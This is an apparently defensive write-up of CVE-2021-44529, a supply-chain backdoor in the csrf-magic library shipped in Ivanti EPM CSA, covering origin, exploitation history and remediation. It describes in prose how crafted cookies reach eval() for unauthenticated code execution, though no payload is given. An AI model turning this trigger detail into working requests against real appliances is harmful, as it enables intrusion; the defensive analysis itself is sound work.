CVE-2021-44529

What is Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA)?

Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) is a hardware/virtual Internet gateway appliance that allows devices located outside the corporate network — laptops, field devices, remote workers — to communicate securely with the Ivanti EPM core server as if they were on the internal LAN. It functions as a secure reverse proxy and authentication relay, bridging off-network agents back to the EPM management infrastructure over the public Internet.

EPM CSA is distinct from Ivanti EPM itself:

• Ivanti EPM (Endpoint Manager) is the on-premises management console responsible for inventory, patch deployment, software distribution, and remote control of managed endpoints.
• Ivanti EPM CSA (Cloud Service Appliance) is a separate Linux-based appliance — deployed either as a physical device or a virtual machine in a DMZ — that acts as the internet-facing relay point allowing off-network EPM agents to reach the core server.

Because the CSA is intentionally exposed to the internet and handles authentication traffic from all managed off-network devices, it is a high-value attack target. Compromising the CSA gives an attacker a foothold within the device management communication path for the entire managed fleet.

Overview

Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) contains a code injection vulnerability (CWE-94) that allows an unauthenticated remote attacker to execute arbitrary code on the appliance with the permissions of the nobody user. The vulnerable endpoint is /client/index.php, and the exploitable code is embedded in the PHP library file /opt/landesk/broker/webroot/lib/csrf-magic.php.

What makes this vulnerability particularly notable is how it originated: research published in 2024 by GreyNoise Labs and Sonatype found strong evidence that the vulnerability is not a conventional code injection flaw but rather a supply-chain backdoor — malicious eval() code was covertly introduced into the open-source csrf-magic library in a commit labeled "1.0.5 update" (dated February 1, 2014), and that poisoned version was subsequently bundled into Ivanti's EPM CSA product. The backdoor may have been present in the product for approximately seven years before discovery.

CISA added CVE-2021-44529 to the KEV catalog on March 25, 2024 — over two years after the original advisory — confirming that active exploitation was observed. The CISA KEV entry notes ransomware actor use.

Affected Versions

Note: CSA 4.5 reached end of life. Organizations on CSA 4.5 must upgrade to a supported release. The fix is available in CSA 4.6 build 512 or later.

Technical Details

CVE-2021-44529 is a CWE-94 (Improper Control of Generation of Code / Code Injection) vulnerability. The root of the issue lies in backdoored PHP code embedded in csrf-magic.php, a library Ivanti bundled with EPM CSA.

The backdoor mechanism:

The malicious code, located between lines 399 and 407 of /opt/landesk/broker/webroot/lib/csrf-magic.php, reads values from HTTP cookies passed to the /client/index.php endpoint. The attack requires at least four cookies:

• The first cookie must contain the value ab
• The last three cookies are concatenated, base64-decoded (with light obfuscation), and then passed directly to PHP's eval() function

This means a crafted HTTP request with specifically structured cookie values causes the appliance to execute arbitrary PHP code server-side — with no authentication required.

Supply-chain origin:

The malicious commit ("1.0.5 update," commit hash f7f84f8, dated February 1, 2014) was introduced to a GitHub clone of the legitimate csrf-magic project. The commit no longer appears in the official csrf-magic repository or any known mirror, suggesting it was specifically crafted for supply-chain insertion. Ivanti bundled this poisoned version into EPM CSA, embedding the backdoor in the product for years.

Attack characteristics:

• No authentication required
• Single HTTP request with crafted cookie values is sufficient
• Executed code runs as the nobody user (limited OS privileges), but sufficient for initial foothold
• A public Metasploit module (Rapid7) exists for this vulnerability
• Nuclei detection templates are publicly available

CWE-94 (Improper Control of Generation of Code): The product constructs code using externally influenced input without neutralizing elements that could modify the intended code behavior. In this case, cookie-supplied values flow directly into eval() without sanitization.

Discovery

Security researcher Jakub Kramarz is credited with discovering CVE-2021-44529. Ivanti published Security Advisory SA-2021-12-02 on December 2, 2021, framing the issue as a code injection vulnerability.

In February 2024, GreyNoise Labs and Sonatype independently published deeper analyses reconsidering the nature of the flaw. Both concluded that the vulnerability is better characterized as a supply-chain backdoor deliberately introduced into the csrf-magic PHP library, rather than an accidental programming error. GreyNoise noted the original malicious commit had been scrubbed from public repositories, making forensic reconstruction difficult. Bitsight subsequently published research detailing how the backdoor's distinctive fingerprint could itself be used as a detection mechanism to identify vulnerable or compromised appliances.

Exploitation Context

CISA added CVE-2021-44529 to the KEV catalog on March 25, 2024 — more than two years after the initial advisory — confirming that threat actors were actively exploiting the vulnerability. The KEV entry attributes use to ransomware actors.

The long gap between the initial 2021 advisory (when public exploit tooling was not widely available) and the 2024 KEV addition likely reflects that exploitation became more widespread after Metasploit module availability lowered the barrier to weaponization. Internet scans conducted around the time of KEV listing found approximately 1,748 internet-facing Ivanti CSA instances, of which at least 41 remained vulnerable to CVE-2021-44529.

The supply-chain nature of the backdoor also raises a broader concern: if the csrf-magic poisoning predates the 2021 discovery, the backdoor may have been accessible to a threat actor aware of it for years before public disclosure — an unknown pre-disclosure exploitation window.

Remediation

1. Upgrade EPM CSA to version 4.6.0-512 or later — this is the only fix; apply it immediately via the Ivanti update mechanism
2. Discontinue CSA 4.5 — CSA 4.5 is end-of-life and will not receive patches; migrate to a supported release
3. Restrict internet access to the CSA management interface — while the CSA is intentionally internet-exposed for agent communication, management and administrative interfaces should be firewalled to trusted IP ranges only
4. Audit CSA access logs — review logs for requests to /client/index.php with unusual cookie patterns, particularly from unexpected source IPs, covering the period before the patch was applied
5. Treat the CSA as potentially compromised — if the appliance was exposed to the internet running a vulnerable version without network controls, assume exploitation may have occurred; forensically image the appliance before remediation if possible
6. Check for persistence mechanisms — the nobody user execution context limits direct system-level persistence, but review for web shells, modified PHP files, or cron jobs added under web server accounts
7. Rotate credentials passed through the CSA — EPM agent authentication tokens and any credentials transiting the CSA should be rotated after confirmed or suspected compromise